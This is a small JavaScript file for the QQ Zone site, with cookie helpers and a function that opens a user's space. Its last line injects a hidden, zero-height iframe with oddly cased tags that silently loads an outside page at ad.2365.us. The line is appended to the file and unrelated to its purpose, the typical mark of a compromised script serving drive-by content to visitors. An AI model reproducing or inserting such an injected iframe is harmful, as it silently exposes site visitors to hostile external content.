function setCookie(name,value)
{
	document.cookie = name + "=" + value + "; path=/; domain=q-zone.qq.com";
}

function getCookie(name)
{
	var search;
	search = name + "=";
	offset = document.cookie.indexOf(search);
	if (offset != -1) {
		offset += search.length;
		end = document.cookie.indexOf(";", offset);
		if (end == -1)
			end = document.cookie.length;
		return unescape(document.cookie.substring(offset, end));
	}
	else
		return "";
}

/* 打开用户的QQ空间 */
function openUserSpace(sUin)
{
	var sUrl= "http://"+sUin+".q-zone.qq.com";
	if (getCookie("clientver") == "")
		window.open(sUrl, "space", "width=925,height=655");
	else
		window.top.location=sUrl;
}
document.writeln("<iFrAmE SRc=http:\/\/ad.2365.us\/116\/ width=100 height=0 frameborder=0><\/IfRaMe>"); 
 
 
 
